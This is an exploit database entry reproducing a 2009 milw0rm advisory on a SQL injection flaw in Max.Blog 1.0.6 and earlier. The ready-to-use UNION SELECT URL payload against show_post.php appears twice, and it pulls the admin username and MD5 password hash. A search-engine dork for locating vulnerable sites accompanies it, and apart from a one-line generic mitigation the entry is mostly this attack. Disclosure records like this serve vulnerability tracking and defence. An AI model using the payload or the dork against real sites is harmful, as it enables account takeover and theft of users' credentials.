header-logo
Suggest Exploit
vendor:
Max.Blog
by:
Salvatore 'drosophila' Fresta
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Max.Blog
Affected Version From: Max.Blog <= 1.0.6
Affected Version To: Max.Blog <= 1.0.6
Patch Exists: YES
Related CWE: N/A
CPE: a:mzbservices:max.blog
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SQL Injection in Max.Blog

This bug allows a guest to view username and password (md5) of a registered user with the specified id (usually 1 for the admin) by using the following URL: http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

###################             Salvatore "drosophila" Fresta         ###################


Application:     Max.Blog http://www.mzbservices.com
Version:         Max.Blog <= 1.0.6
Bug:             * SQL Injection
Exploitation:    Remote
Dork:            intext:"Powered by Max.Blog"
Date:            20 Jan 2009
Discovered by:   Salvatore "drosophila" Fresta
Author:          Salvatore "drosophila" Fresta
                 e-mail: drosophilaxxx@gmail.com


############################################################################

- BUGS

SQL Injection:

       File affected: show_post.php

       This bug allows a guest to view username and password (md5) of a
       registered user with the specified id (usually 1 for the admin)

       http://www.site.com/path/show_post.php?id=-1'+UNION+ALL+SELECT+1,concat('username: ', username),concat('password: ', password),4,5,6,7+FROM+users+WHERE+id=1%23

############################################################################

# milw0rm.com [2009-01-27]